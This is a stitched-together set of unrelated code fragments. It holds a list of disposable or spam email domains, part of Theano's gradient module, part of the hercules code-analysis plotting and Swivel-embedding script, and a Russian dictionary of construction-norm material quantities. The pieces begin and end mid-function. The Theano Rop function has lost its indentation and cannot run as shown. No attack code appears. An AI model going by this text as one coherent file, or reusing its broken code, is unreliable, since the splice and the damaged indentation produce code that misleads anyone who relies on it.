"ckfibyvz1nzwqrmp.cf",
"ckfibyvz1nzwqrmp.ga",
"ckfibyvz1nzwqrmp.gq",
"ckfibyvz1nzwqrmp.ml",
"ckfibyvz1nzwqrmp.tk",
"ckfsunwwtlhwkclxjah.cf",
"ckfsunwwtlhwkclxjah.ga",
"ckfsunwwtlhwkclxjah.gq",
"ckfsunwwtlhwkclxjah.ml",
"ckfsunwwtlhwkclxjah.tk",
"ckme1c0id1.cf",
"ckme1c0id1.ga",
"ckme1c0id1.gq",
"ckme1c0id1.ml",
"ckme1c0id1.tk",
"cko.kr",
"ckoie.com",
"ckyxtcva19vejq.cf",
"ckyxtcva19vejq.ga",
"ckyxtcva19vejq.gq",
"ckyxtcva19vejq.ml",
"ckyxtcva19vejq.tk",
"claimab.com",
"clandest.in",
"clarkgriswald.net",
"clashkings.ru",
"clasicoloto.ru",
"classydeveloper.com",
"classywebsite.co",
"claus.tk",
"clay.xyz",
"clayandplay.ru",
"cleaning-co.ru",
"cleansafemail.com",
"clear-project.ru",
"clearmail.online",
"clearwatermail.info",
"cledbel-24k-gold-kupit.ru",
"clendere.asia",
"cleonika.ru",
"clever-game.ru",
"click-mail.net",
"clickas.ru",
"clickdeal.co",
"clickfun.ru",
"clickmagnit.ru",
"clickmail.info",
"clikco.ru",
"clinicatbf.com",
"clipmail.cf",
"clipmail.ga",
"clipmail.gq",
"clipmail.ml",
"clipmail.tk",
"clipmails.com",
"cliptik.net",
"clixser.com",
"clock-sale24.ru",
"clonefbtmc1.club",
"cloneviptmc1.club",
"cloud99.pro",
"cloud99.top",
"cloudemail.xyz",
"cloudmail.gq",
"cloudmail.tk",
"cloudns.cc",
"cloudns.cf",
"cloudns.cx",
"cloudns.gq",
"cloudstat.top",
"cloudstreaming.info",
"cloudt12server01.com",
"clounatiks.ru",
"clpuqprtxtxanx.cf",
"clpuqprtxtxanx.ga",
"clpuqprtxtxanx.gq",
"clpuqprtxtxanx.ml",
"clpuqprtxtxanx.tk",
"clrmail.com",
"clubfier.com",
"clublife.ga",
"clubstt.com",
"clue-1.com",
"clutunpodli.ddns.info",
"cmail.club",
"cmail.com",
"cmail.net",
"cmail.org",
"cmawfxtdbt89snz9w.cf",
"cmawfxtdbt89snz9w.ga",
"cmawfxtdbt89snz9w.gq",
"cmawfxtdbt89snz9w.ml",
"cmawfxtdbt89snz9w.tk",
"cmc88.tk",
"cmcosmetics.ru",
"cmecsgocup.ru",
"cmmgtuicmbff.ga",
"cmmgtuicmbff.ml",
"cmmgtuicmbff.tk",
"cms-rt.com.com",
"cnamed.com",
"cndps.com",
"cnh.industrial.ga",
"cnh.industrial.gq",
"cnhindustrial.cf",
"cnhindustrial.ga",
"cnhindustrial.gq",
"cnhindustrial.ml",
"cnhindustrial.tk",
"cnshosti.in",
"co1vgedispvpjbpugf.cf",
"co1vgedispvpjbpugf.ga",
"co1vgedispvpjbpugf.gq",
"co1vgedispvpjbpugf.ml",
"co1vgedispvpjbpugf.tk",
"coachfit.ru",
"cobarekyo1.ml",
"cobete.cf",
"cobin2hood.com",
"cocaine.ninja",
"coccx1ajbpsz.cf",
"coccx1ajbpsz.ga",
"coccx1ajbpsz.gq",
"coccx1ajbpsz.ml",
"coccx1ajbpsz.tk",
"cochatz.ga",
"cock.lu",
"cocodani.cf",
"cocovpn.com",
"code-mail.com",
"codyting.com",
"coepoe.cf",
"coepoe.ga",
"coepoe.tk",
"coepoebete.ga",
"coepoekorea.ml",
"coffeelovers.life",
"coffeepancakewafflebacon.com",
"coin-link.com",
"coinbroker.club",
"coincal.org",
"coinlink.club",
"coiosidkry57hg.gq",
"cok.3utilities.com",
| |
"""Driver for gradient calculations."""
__authors__ = "<NAME>, <NAME>, <NAME>"
__copyright__ = "(c) 2011, Universite de Montreal"
__license__ = "3-clause BSD License"
__contact__ = "theano-dev <<EMAIL>>"
__docformat__ = "restructuredtext en"
import __builtin__
import logging
import warnings
_logger = logging.getLogger('theano.gradient')
import sys
import numpy # for numeric_grad
import theano
from theano.raise_op import Raise
from theano import gof
from theano.gof import Variable
from theano.gof.python25 import all
import theano.gof.utils
# Error messages used when an Op's grad() implementation returns something
# malformed (not a list/tuple, or the wrong number of gradients).
_msg_retType = 'op.grad(...) returned a non-list'
_msg_badlen = 'op.grad(...) returned wrong number of gradients'
def format_as(use_list, use_tuple, outputs):
    """
    Format `outputs` according to the flags `use_list` and `use_tuple`.

    If `use_list` is True, return `outputs` as a list (a non-list,
    non-tuple value is wrapped in a one-element list).
    If `use_tuple` is True, return `outputs` as a tuple (a non-list,
    non-tuple value is wrapped in a one-element tuple).
    If both flags are False, a one-element list/tuple is unwrapped to its
    single element and anything else is returned unchanged.
    """
    assert not (use_list and use_tuple), \
        "Both flags cannot be simultaneously True"
    is_sequence = isinstance(outputs, (list, tuple))
    if not (use_list or use_tuple):
        # neither flag set: unwrap a singleton sequence, pass through otherwise
        if is_sequence:
            assert len(outputs) == 1, \
                "Wrong arguments. Expected a one element list"
            return outputs[0]
        return outputs
    wrap = list if use_list else tuple
    # a flag is set: convert a sequence, or wrap a bare value
    return wrap(outputs) if is_sequence else wrap([outputs])
def grad_sources_inputs(sources, graph_inputs, warn_type=True):
    """
    A gradient source is a pair (``v``, ``g_v``), in which ``v`` is
    a `Variable`, and ``g_v`` is a `Variable` that is a gradient wrt
    ``v``. More specifically, ``g_v`` is the gradient of an external
    scalar cost, ``cost`` (that is not explicitly used), wrt ``v``.
    This function traverses the graph backward from the ``r`` sources,
    calling ``op.grad(...)`` for all ops with some non-None gradient
    on an output, to compute gradients of ``cost`` wrt intermediate
    variables and ``graph_inputs``.
    The ``op.grad(...)`` functions are called like this:
    .. code-block:: python
        op.grad(op.inputs[:], [total_gradient(v) for v in op.outputs])
    This call to ``op.grad`` should return a list or tuple: one symbolic
    gradient per input. These gradients represent the gradients of
    the same implicit ``cost`` mentioned above, wrt ``op.inputs``. Note
    that this is **not** the same as the gradient of ``op.outputs`` wrt
    ``op.inputs``.
    If ``op`` has a single input, then ``op.grad`` should return a list
    or tuple of length 1.
    For each input wrt to which ``op`` is not differentiable, it should
    return ``None`` instead of a `Variable` instance.
    If a source ``r`` receives a gradient from another source ``r2``,
    then the effective gradient on ``r`` is the sum of both gradients.
    :type sources: list of pairs of Variable: (v, gradient-on-v) to
        initialize the total_gradient dictionary
    :param sources: gradients to back-propagate using chain rule
    :type graph_inputs: list of Variable
    :param graph_inputs: variables considered to be constant
        (do not backpropagate through them)
    :type warn_type: bool
    :param warn_type: True will trigger warnings via the logging module when
        the gradient on an expression has a different type than the original
        expression
    :rtype: dictionary whose keys and values are of type Variable
    :return: mapping from each Variable encountered in the backward
        traversal to the gradient with respect to that Variable.
    It is assumed that there is some objective J shared between all members of
    sources, so that for each v, gradient-on-v is the gradient of J with
    respect to v
    """
    # Seed the total-gradient map with the caller-supplied gradients,
    # summing when the same Variable appears in several sources.
    gmap = {}
    for (r, g_r) in sources:
        if not hasattr(r, 'type'):
            raise TypeError('sources must be Variables', r)
        if g_r is not None:
            if r in gmap:
                gmap[r] = gmap[r] + g_r
            else:
                gmap[r] = g_r
    graph_outputs = gof.utils.uniq([r for r, g in sources])
    if graph_inputs is None:
        graph_inputs = gof.graph.inputs(graph_outputs)
    # Walk the graph in reverse topological order so every node's output
    # gradients are fully accumulated before its grad() is called.
    for node in gof.graph.io_toposort(graph_inputs,
                                      graph_outputs).__reversed__():
        g_outputs = [gmap.get(o, None) for o in node.outputs]
        #if all output gradients are None, continue
        if all(map(lambda x: x is None, g_outputs)): continue
        output_arg = g_outputs
        input_arg = node.inputs
        # Each Op's grad function requires inputs and output_grads
        # If the Op destroys any input, but the grad expression uses it,
        # then chances are the resulting graph will have a dependency
        # cycle. We avoid this cycle by passing (symbolic) copies of
        # each destroyed input.
        try:
            dinputs = [node.inputs[x[0]] for x in node.op.destroy_map.values()]
        except AttributeError:
            # op has no destroy_map: nothing is destroyed in place
            dinputs = []
        new_input_arg = []
        for input in input_arg:
            if input in dinputs and hasattr(input, 'copy'):
                new_input_arg.append(input.copy())
            else:
                new_input_arg.append(input)
        input_arg = new_input_arg
        #note that this function is not in a try-except block
        # the rationale:
        # If the op implements grad, then any exception should be passed to
        # the caller
        # If the op doesn't implement grad, this entire function should fail.
        # Other possibilities:
        #  * return a partial back-prop
        #
        op_grad = node.op.grad(input_arg, output_arg)
        if not isinstance(op_grad, (list, tuple)):
            raise ValueError(_msg_retType, node.op)
        g_inputs = op_grad
        assert isinstance(g_inputs, (list, tuple))
        if len(g_inputs) != len(node.inputs):
            raise ValueError(_msg_badlen,
                             node.op,
                             len(g_inputs),
                             len(node.inputs))
        # Accumulate each returned input gradient into gmap, optionally
        # warning when its type differs from the variable it is a gradient of.
        for ii, (r, g_r) in enumerate(zip(node.inputs, g_inputs)):
            if warn_type:
                if g_r and (getattr(r, 'type', 0) != getattr(g_r, 'type', 1)):
                    r_type = getattr(r, 'type', None)
                    g_r_type = getattr(g_r, 'type', None)
                    _logger.warning('%s.grad returned a different type (%s) '
                            'for input %i of type (%s)',
                            node.op, g_r_type, ii, r_type)
            # Give the gradient a readable name like "(dcost/dx)" when there
            # is a single named source and the input is named.
            if g_r and len(sources) == 1 and sources[0][0].name and r.name:
                g_r.name = "(d%s/d%s)" % (sources[0][0].name, r.name)
            if g_r is not None:
                assert r is not None
                if r in gmap:
                    gmap[r] = gmap[r] + g_r
                else:
                    gmap[r] = g_r
    return gmap
def unimplemented_grad(op, x_pos, x):
    """
    DO NOT USE. Remove this function after all usage of it has been
    removed from theano.

    Build an un-computable symbolic variable with the type of `x`. Any
    attempt to actually compute the returned variable raises
    NotImplementedError, signalling that `op` has no gradient defined for
    its `x_pos`'th input.
    """
    return Raise(msg='%s.grad not implemented for input %i' % (op, x_pos))(x)
########################
# R Operator
########################
def Rop(f, wrt, eval_points):
"""
Computes the R operation on `f` wrt to `wrt` evaluated at points given
in `eval_points`. Mathematically this stands for the jacobian of `f` wrt
to `wrt` right muliplied by the eval points.
:type f: Variable or list of Variables
`f` stands for the output of the computational graph to which you
want to apply the R operator
:type wrt: Variable or list of `Variables`s
variables for which you compute the R operator of the expression
described by `f`
:type eval_points: Variable or list of Variables
evalutation points for each of the variables in `wrt`
:rtype: Variable or list/tuple of Variables depending on type of f
:return: symbolic expression such that
R_op[i] = sum_j ( d f[i] / d wrt[j]) eval_point[j]
where the indices in that expression are magic multidimensional
indices that specify both the position within a list and all
coordinates of the tensor element in the last.
If `wrt` is a list/tuple, then return a list/tuple with the results.
"""
from theano.tensor import as_tensor_variable
using_list = isinstance(f, list)
using_tuple = isinstance(f, tuple)
if not isinstance(wrt, (list, tuple)):
wrt = [wrt]
if not isinstance(eval_points, (list, tuple)):
eval_points = [eval_points]
if not isinstance(f, (list, tuple)):
f = [f]
assert len(wrt) == len(eval_points)
# Check that each element of wrt corresponds to an element
# of eval_points with the same dimensionality.
for pack in enumerate(zip(wrt, eval_points)):
i = pack[0]
wrt_elem, eval_point = pack[1]
if not isinstance(wrt_elem, gof.Variable):
wrt_elem = as_tensor_variable(wrt_elem)
if not isinstance(eval_point, gof.Variable):
eval_point = as_tensor_variable(eval_point)
try:
if wrt_elem.type.ndim != eval_point.type.ndim:
raise ValueError('Element ' +
str(i) +
' of wrt/eval_point have mismatched ' +
'dimensionality: ' +
str(wrt_elem.type.ndim) +
' versus ' +
str(eval_point.type.ndim))
except AttributeError:
# wrt_elem and eval_point don't always have ndim like random type
# Tensor, Sparse and CudaNdArray have the ndim attribute
pass
seen_nodes = {}
def _traverse(node):
""" TODO: writeme """
if node is None:
return None
else:
op = node.op
inputs = node.inputs
# Compute the evaluation points corresponding to each of the
# inputs of the node
local_eval_points = []
for inp in inputs:
if inp in | |
args.mode == "all":
output = get_plot_path(args.output, "matrix")
else:
output = args.output
with open(output, "w") as fout:
json.dump(data, fout, sort_keys=True, default=default_json)
return
import matplotlib
if args.backend:
matplotlib.use(args.backend)
import matplotlib.pyplot as pyplot
s = 4 + matrix.shape[1] * 0.3
fig = pyplot.figure(figsize=(s, s))
ax = fig.add_subplot(111)
ax.xaxis.set_label_position("top")
ax.matshow(matrix, cmap=pyplot.cm.OrRd)
ax.set_xticks(numpy.arange(0, matrix.shape[1]))
ax.set_yticks(numpy.arange(0, matrix.shape[0]))
ax.set_yticklabels(people, va="center")
ax.set_xticks(numpy.arange(0.5, matrix.shape[1] + 0.5), minor=True)
ax.set_xticklabels(["Unidentified"] + people, rotation=45, ha="left",
va="bottom", rotation_mode="anchor")
ax.set_yticks(numpy.arange(0.5, matrix.shape[0] + 0.5), minor=True)
ax.grid(which="minor")
apply_plot_style(fig, ax, None, args.style, args.text_size, args.size)
if not args.output:
pos1 = ax.get_position()
pos2 = (pos1.x0 + 0.15, pos1.y0 - 0.1, pos1.width * 0.9, pos1.height * 0.9)
ax.set_position(pos2)
if args.mode == "all":
output = get_plot_path(args.output, "matrix")
else:
output = args.output
title = "%s %d developers overwrite" % (repo, matrix.shape[0])
if args.output:
# FIXME(vmarkovtsev): otherwise the title is screwed in savefig()
title = ""
deploy_plot(title, output, args.style)
def plot_ownership(args, repo, names, people, date_range, last):
    """Plot (or dump as JSON) the code-ownership stack chart for `repo`.

    Parameters
    ----------
    args : argparse.Namespace with output/mode/backend/relative/style/
        text_size/size attributes.
    repo : str, repository name used in the plot title.
    names : labels for the stacked series (one per developer).
    people : 2-D numpy array handed to ``stackplot`` — assumes rows are
        per-developer series and columns are time samples (TODO confirm
        against caller).
    date_range : x-axis values; last : right x-limit.

    If ``args.output`` ends with ".json" the raw arguments are dumped as
    JSON instead of plotting.
    """
    if args.output and args.output.endswith(".json"):
        # Capture only the function arguments (nothing local is defined yet).
        data = locals().copy()
        del data["args"]
        data["type"] = "ownership"
        if args.mode == "all":
            output = get_plot_path(args.output, "people")
        else:
            output = args.output
        with open(output, "w") as fout:
            json.dump(data, fout, sort_keys=True, default=default_json)
        return
    import matplotlib
    if args.backend:
        matplotlib.use(args.backend)
    import matplotlib.pyplot as pyplot
    # BUG FIX: normalize *before* drawing. The original divided `people`
    # after stackplot() had already rendered it, so the plot showed raw
    # values while ylim was clamped to [0, 1].
    if args.relative:
        for i in range(people.shape[1]):
            people[:, i] /= people[:, i].sum()
        legend_loc = 3
    else:
        legend_loc = 2
    pyplot.stackplot(date_range, people, labels=names)
    pyplot.xlim(date_range[0], last)
    if args.relative:
        pyplot.ylim(0, 1)
    legend = pyplot.legend(loc=legend_loc, fontsize=args.text_size)
    apply_plot_style(pyplot.gcf(), pyplot.gca(), legend, args.style, args.text_size, args.size)
    if args.mode == "all":
        output = get_plot_path(args.output, "people")
    else:
        output = args.output
    deploy_plot("%s code ownership through time" % repo, output, args.style)
IDEAL_SHARD_SIZE = 4096


def train_embeddings(index, matrix, tmpdir, shard_size=IDEAL_SHARD_SIZE):
    """Train Swivel co-occurrence embeddings over `matrix`.

    Parameters
    ----------
    index : sequence of str
        Names attached to the rows/columns of `matrix`.
    matrix : scipy.sparse CSR-like matrix (square); len(index) <= its side.
    tmpdir : str or None
        Parent directory for the temporary Swivel working tree.
    shard_size : int
        Desired Swivel submatrix size; the matrix may be truncated so it
        tiles evenly into shards.

    Returns
    -------
    meta_index : list of (name, self-co-occurrence count) for the kept rows.
    embeddings : list of numpy arrays — averaged row/column embeddings.
    """
    try:
        from . import swivel
    except (SystemError, ImportError):
        import swivel
    import tensorflow as tf

    assert matrix.shape[0] == matrix.shape[1]
    assert len(index) <= matrix.shape[0]
    # Clip extreme counts at the 99th percentile to tame outliers.
    outlier_threshold = numpy.percentile(matrix.data, 99)
    matrix.data[matrix.data > outlier_threshold] = outlier_threshold
    nshards = len(index) // shard_size
    if nshards * shard_size < len(index):
        nshards += 1
        shard_size = len(index) // nshards
        nshards = len(index) // shard_size
    remainder = len(index) - nshards * shard_size
    if remainder > 0:
        # Drop the `remainder` sparsest rows so the matrix tiles evenly.
        lengths = matrix.indptr[1:] - matrix.indptr[:-1]
        filtered = sorted(numpy.argsort(lengths)[remainder:])
    else:
        filtered = list(range(len(index)))
    if len(filtered) < matrix.shape[0]:
        print("Truncating the sparse matrix...")
        matrix = matrix[filtered, :][:, filtered]
    meta_index = []
    for i, j in enumerate(filtered):
        meta_index.append((index[j], matrix[i, i]))
    index = [mi[0] for mi in meta_index]
    with tempfile.TemporaryDirectory(prefix="hercules_labours_", dir=tmpdir or None) as tmproot:
        print("Writing Swivel metadata...")
        vocabulary = "\n".join(index)
        with open(os.path.join(tmproot, "row_vocab.txt"), "w") as out:
            out.write(vocabulary)
        with open(os.path.join(tmproot, "col_vocab.txt"), "w") as out:
            out.write(vocabulary)
        del vocabulary
        bool_sums = matrix.indptr[1:] - matrix.indptr[:-1]
        bool_sums_str = "\n".join(map(str, bool_sums.tolist()))
        with open(os.path.join(tmproot, "row_sums.txt"), "w") as out:
            out.write(bool_sums_str)
        with open(os.path.join(tmproot, "col_sums.txt"), "w") as out:
            out.write(bool_sums_str)
        del bool_sums_str
        # Swivel expects rows/cols ordered by decreasing frequency.
        reorder = numpy.argsort(-bool_sums)
        print("Writing Swivel shards...")
        for row in range(nshards):
            for col in range(nshards):
                def _int64s(xs):
                    return tf.train.Feature(
                        int64_list=tf.train.Int64List(value=list(xs)))

                def _floats(xs):
                    return tf.train.Feature(
                        float_list=tf.train.FloatList(value=list(xs)))

                indices_row = reorder[row::nshards]
                indices_col = reorder[col::nshards]
                shard = matrix[indices_row][:, indices_col].tocoo()
                example = tf.train.Example(features=tf.train.Features(feature={
                    "global_row": _int64s(indices_row),
                    "global_col": _int64s(indices_col),
                    "sparse_local_row": _int64s(shard.row),
                    "sparse_local_col": _int64s(shard.col),
                    "sparse_value": _floats(shard.data)}))
                with open(os.path.join(tmproot, "shard-%03d-%03d.pb" % (row, col)), "wb") as out:
                    out.write(example.SerializeToString())
        print("Training Swivel model...")
        swivel.FLAGS.submatrix_rows = shard_size
        swivel.FLAGS.submatrix_cols = shard_size
        # Heuristic schedule: smaller vocabularies get more epochs.
        if len(meta_index) <= IDEAL_SHARD_SIZE / 16:
            embedding_size = 50
            num_epochs = 100000
        elif len(meta_index) <= IDEAL_SHARD_SIZE:
            embedding_size = 50
            num_epochs = 50000
        elif len(meta_index) <= IDEAL_SHARD_SIZE * 2:
            embedding_size = 60
            num_epochs = 10000
        elif len(meta_index) <= IDEAL_SHARD_SIZE * 4:
            embedding_size = 70
            num_epochs = 8000
        elif len(meta_index) <= IDEAL_SHARD_SIZE * 10:
            embedding_size = 80
            num_epochs = 5000
        elif len(meta_index) <= IDEAL_SHARD_SIZE * 25:
            embedding_size = 100
            num_epochs = 1000
        elif len(meta_index) <= IDEAL_SHARD_SIZE * 100:
            embedding_size = 200
            num_epochs = 600
        else:
            embedding_size = 300
            num_epochs = 300
        if os.getenv("CI"):
            # Travis, AppVeyor etc. during the integration tests.
            # BUG FIX: use floor division — "/=" yields a float epoch count
            # under Python 3, which an epoch counter should never be.
            num_epochs //= 10
        swivel.FLAGS.embedding_size = embedding_size
        swivel.FLAGS.input_base_path = tmproot
        swivel.FLAGS.output_base_path = tmproot
        swivel.FLAGS.loss_multiplier = 1.0 / shard_size
        swivel.FLAGS.num_epochs = num_epochs
        # Tensorflow 1.5 parses sys.argv unconditionally *applause*
        argv_backup = sys.argv[1:]
        del sys.argv[1:]
        swivel.main(None)
        sys.argv.extend(argv_backup)
        print("Reading Swivel embeddings...")
        embeddings = []
        with open(os.path.join(tmproot, "row_embedding.tsv")) as frow:
            with open(os.path.join(tmproot, "col_embedding.tsv")) as fcol:
                for i, (lrow, lcol) in enumerate(zip(frow, fcol)):
                    prow, pcol = (l.split("\t", 1) for l in (lrow, lcol))
                    assert prow[0] == pcol[0]
                    # NOTE(review): numpy.fromstring(sep=...) is deprecated in
                    # modern NumPy; consider numpy.array(p[1].split("\t"), ...)
                    # once behavior parity is verified.
                    erow, ecol = \
                        (numpy.fromstring(p[1], dtype=numpy.float32, sep="\t")
                         for p in (prow, pcol))
                    # Average the row and column embeddings for each token.
                    embeddings.append((erow + ecol) / 2)
    return meta_index, embeddings
class CORSWebServer(object):
    """Serve the current directory over HTTP with a permissive CORS header.

    The stdlib test server runs on a background thread so the caller can
    keep working; `start`/`stop` manage the lifecycle.
    """

    def __init__(self):
        # The concrete HTTPServer instance is captured lazily by serve().
        self.server = None
        self.thread = threading.Thread(target=self.serve)

    def serve(self):
        """Thread target: run the stdlib test server until shutdown()."""
        owner = self
        try:
            from http.server import HTTPServer, SimpleHTTPRequestHandler, test
        except ImportError:  # Python 2 fallback
            from BaseHTTPServer import HTTPServer, test
            from SimpleHTTPServer import SimpleHTTPRequestHandler

        class ClojureServer(HTTPServer):
            # Registers itself on the outer object so stop() can reach it.
            def __init__(self, *args, **kwargs):
                HTTPServer.__init__(self, *args, **kwargs)
                owner.server = self

        class CORSRequestHandler(SimpleHTTPRequestHandler):
            # Inject the CORS header into every response.
            def end_headers(self):
                self.send_header("Access-Control-Allow-Origin", "*")
                SimpleHTTPRequestHandler.end_headers(self)

        test(CORSRequestHandler, ClojureServer)

    def start(self):
        """Launch the background serving thread."""
        self.thread.start()

    def stop(self):
        """Shut the server down and wait for the thread to finish."""
        if self.running:
            self.server.shutdown()
            self.thread.join()

    @property
    def running(self):
        """True once serve() has created the underlying HTTPServer."""
        return self.server is not None


web_server = CORSWebServer()
def write_embeddings(name, output, run_server, index, embeddings):
    """Dump embeddings in Tensorflow Projector format.

    Writes <output>_<name>_meta.tsv, <output>_<name>_data.tsv and a
    Projector config JSON; optionally serves them through the module-level
    CORS web server and opens the Projector page in a browser.
    """
    print("Writing Tensorflow Projector files...")
    if not output:
        output = "couples_" + name
    if output.endswith(".json"):
        # A JSON destination means "no interactive serving".
        output = os.path.join(output[:-5], "couples")
        run_server = False
    metaf = "%s_%s_meta.tsv" % (output, name)
    with open(metaf, "w") as fout:
        fout.write("name\tcommits\n")
        fout.writelines("%s\t%s\n" % pair for pair in index)
    print("Wrote", metaf)
    dataf = "%s_%s_data.tsv" % (output, name)
    with open(dataf, "w") as fout:
        fout.writelines("\t".join(str(v) for v in vec) + "\n"
                        for vec in embeddings)
    print("Wrote", dataf)
    jsonf = "%s_%s.json" % (output, name)
    with open(jsonf, "w") as fout:
        fout.write("""{
  "embeddings": [
    {
      "tensorName": "%s %s coupling",
      "tensorShape": [%s, %s],
      "tensorPath": "http://0.0.0.0:8000/%s",
      "metadataPath": "http://0.0.0.0:8000/%s"
    }
  ]
}
""" % (output, name, len(embeddings), len(embeddings[0]), dataf, metaf))
    print("Wrote %s" % jsonf)
    if run_server and not web_server.running:
        web_server.start()
    url = "http://projector.tensorflow.org/?config=http://0.0.0.0:8000/" + jsonf
    print(url)
    if not run_server:
        return
    # Prefer xdg-open, then $BROWSER, else just echo the URL.
    if shutil.which("xdg-open") is not None:
        os.system("xdg-open " + url)
    else:
        browser = os.getenv("BROWSER", "")
        if browser:
            os.system(browser + " " + url)
        else:
            print("\t" + url)
def show_shotness_stats(data):
    """Print structural hotness records, most-hit first.

    Each record is expected to expose `counters` (indexable by the
    record's own position, giving its self-count), `file`, `name` and
    `internal_role` attributes — presumably Shotness protobuf records;
    verify against the reader.
    """
    ranked = [(rec.counters[pos], pos) for pos, rec in enumerate(data)]
    for count, pos in sorted(ranked, reverse=True):
        rec = data[pos]
        print("%8d %s:%s [%s]" % (count, rec.file, rec.name, rec.internal_role))
def show_sentiment_stats(args, name, resample, start, data):
    """Plot per-day sentiment as green (positive) / red (negative) bars.

    `data` is a mapping of day offset -> record with a `Value` attribute;
    values appear centered at 0.5 (0.5 - Value > 0 is treated as positive)
    — presumably a [0, 1] sentiment score, verify against the reader.
    `start` is a Unix timestamp of day zero; `resample` is a pandas-style
    frequency string used only to pick the x-tick locator.
    """
    import matplotlib
    if args.backend:
        matplotlib.use(args.backend)
    import matplotlib.pyplot as pyplot

    start = datetime.fromtimestamp(start)
    data = sorted(data.items())
    # Convert day offsets to absolute dates for the x axis.
    xdates = [start + timedelta(days=d[0]) for d in data]
    xpos = []
    ypos = []
    xneg = []
    yneg = []
    # Split samples into positive and negative bars around the 0.5 midpoint.
    for x, (_, y) in zip(xdates, data):
        y = 0.5 - y.Value
        if y > 0:
            xpos.append(x)
            ypos.append(y)
        else:
            xneg.append(x)
            yneg.append(y)
    pyplot.bar(xpos, ypos, color="g", label="Positive")
    pyplot.bar(xneg, yneg, color="r", label="Negative")
    legend = pyplot.legend(loc=1, fontsize=args.text_size)
    pyplot.ylabel("Lines of code")
    pyplot.xlabel("Time")
    apply_plot_style(pyplot.gcf(), pyplot.gca(), legend, args.style, args.text_size, args.size)
    pyplot.xlim(xdates[0], xdates[-1])
    # Remember the default locator so we can fall back to it below.
    locator = pyplot.gca().xaxis.get_major_locator()
    # set the optimal xticks locator
    if "M" not in resample:
        pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
    locs = pyplot.gca().get_xticks().tolist()
    if len(locs) >= 16:
        # Too many ticks: try yearly ticks, and if still too many,
        # restore the original locator.
        pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
        locs = pyplot.gca().get_xticks().tolist()
        if len(locs) >= 16:
            pyplot.gca().xaxis.set_major_locator(locator)
    if locs[0] < pyplot.xlim()[0]:
        del locs[0]
    # Append explicit ticks at the plot edges when the nearest regular tick
    # is more than half an interval away.
    endindex = -1
    if len(locs) >= 2 and pyplot.xlim()[1] - locs[-1] > (locs[-1] - locs[-2]) / 2:
        locs.append(pyplot.xlim()[1])
        endindex = len(locs) - 1
    startindex = -1
    if len(locs) >= 2 and locs[0] - pyplot.xlim()[0] > (locs[1] - locs[0]) / 2:
        locs.append(pyplot.xlim()[0])
        startindex = len(locs) - 1
    pyplot.gca().set_xticks(locs)
    # hacking time!
    # Overwrite the edge tick labels with the real first/last dates, then
    # disable set_text on them so later formatter passes cannot clobber
    # the custom label.
    labels = pyplot.gca().get_xticklabels()
    if startindex >= 0:
        labels[startindex].set_text(xdates[0].date())
        labels[startindex].set_text = lambda _: None
        labels[startindex].set_rotation(30)
        labels[startindex].set_ha("right")
    if endindex >= 0:
        labels[endindex].set_text(xdates[-1].date())
        labels[endindex].set_text = lambda _: None
        labels[endindex].set_rotation(30)
        labels[endindex].set_ha("right")
    # Aggregate totals, rescaled to [0, 1] per sample (factor 2 undoes the
    # 0.5 midpoint split above).
    overall_pos = sum(2 * (0.5 - d[1].Value) for d in data if d[1].Value < 0.5)
    overall_neg = sum(2 * (d[1].Value - 0.5) for d in data if d[1].Value > 0.5)
    title = "%s sentiment +%.1f -%.1f δ=%.1f" % (
        name, overall_pos, overall_neg, overall_pos - overall_neg)
    deploy_plot(title, args.output, args.style)
def main():
args = parse_args()
reader = read_input(args)
header = reader.get_header()
name = reader.get_name()
burndown_warning = "Burndown stats were not collected. Re-run hercules with --burndown."
burndown_files_warning = \
"Burndown stats for files were not collected. Re-run hercules with " \
"--burndown --burndown-files."
burndown_people_warning = \
"Burndown stats for people were not collected. Re-run hercules with " \
"--burndown --burndown-people."
couples_warning = "Coupling stats were not collected. Re-run hercules with --couples."
shotness_warning = "Structural hotness stats were not collected. Re-run hercules with " \
"--shotness. Also check --languages - the output may be empty."
sentiment_warning = "Sentiment stats were not collected. Re-run hercules with --sentiment."
def run_times():
rt = reader.get_run_times()
import pandas
series = pandas.to_timedelta(pandas.Series(rt).sort_values(ascending=False), unit="s")
df | |
140-270 мм (кубометр)':1.77,
'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':1.09 + 1.34,
'Кирпич керамический (штука)':88,
'Паста антисептическая строительная (килограмм)':3.9,
'Использование крана на автомобильном ходу 10 тонн (часов)':0.38,
'Использование передвижного битумного котла на 400 литров (часов)':0.9,
'Использование дрели электрической (часов)':11.6,
'Использование рубанка электрического (часов)':1.6,
'Использование пилы цепной электрической (часов)':0.62,
'Использование бортового автомобиля до 5 тонн (часов)':0.57,
}
metadict_model['Устройство калиток (100 квадратных метров)'] = {
    # http://www.norm-load.ru/SNiP/Data1/56/56034/index.htm#i674023
    # Table GESN 10-01-071: installation of wicket gates.
    # 01. Preparing, antiseptic-treating and setting wooden posts into ready
    #     pits on brick pads, with subsequent backfilling.
    # 02. Fabricating gate elements, fitting forged hardware and hanging.
    # Unit of measurement: 100 m2 of gates.
    # Gate installation (with post setting): lattice gates up to 1.2 m high.
    # 10-01-071-02 (workers): 369 man-hours
    # 10-01-071-02 (machine operators): 2.9 man-hours
    '_-Работа строительной бригады (нормо-часов)':372,
    'Смола каменноугольная для дорожного строительства (килограмм)':83,
    'Поковки из квадратных заготовок 1.8 кг (килограмм)':100,
    'Болты с гайками и шайбами строительные (килограмм)':100,
    'Лесоматериалы круглые 140-270 мм (кубометр)':4.16,
    'Гвозди строительные (килограмм)':3.5,
    'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':3.41 + 0.6,
    'Доски обрезные хвойные 35x100x6000 мм (кубометр)':1.84,
    'Паста антисептическая строительная (килограмм)':10.5,
    'Кирпич керамический (штука)':360,
    'Использование крана на автомобильном ходу 10 тонн (часов)':1.16,
    'Использование передвижного битумного котла на 400 литров (часов)':2.8,
    'Использование дрели электрической (часов)':40.1,
    'Использование рубанка электрического (часов)':3.7,
    'Использование пилы цепной электрической (часов)':1.7,
    'Использование бортового автомобиля до 5 тонн (часов)':1.73,
}
metadict_model['Установка дверных блоков (100 квадратных метров)'] = {
    # http://www.norm-load.ru/SNiP/Data1/56/56034/index.htm#i423740
    # Table GESN 10-01-040: filling exterior and interior door openings with
    # individual elements in log-built wooden walls.
    # 01. Installing frames, nailing on vertical battens to form a tongue,
    #     cutting a groove in the ends of beams (logs).
    # 02. Fitting and hanging door leaves, installing hardware.
    # 03. Installing casings (architraves).
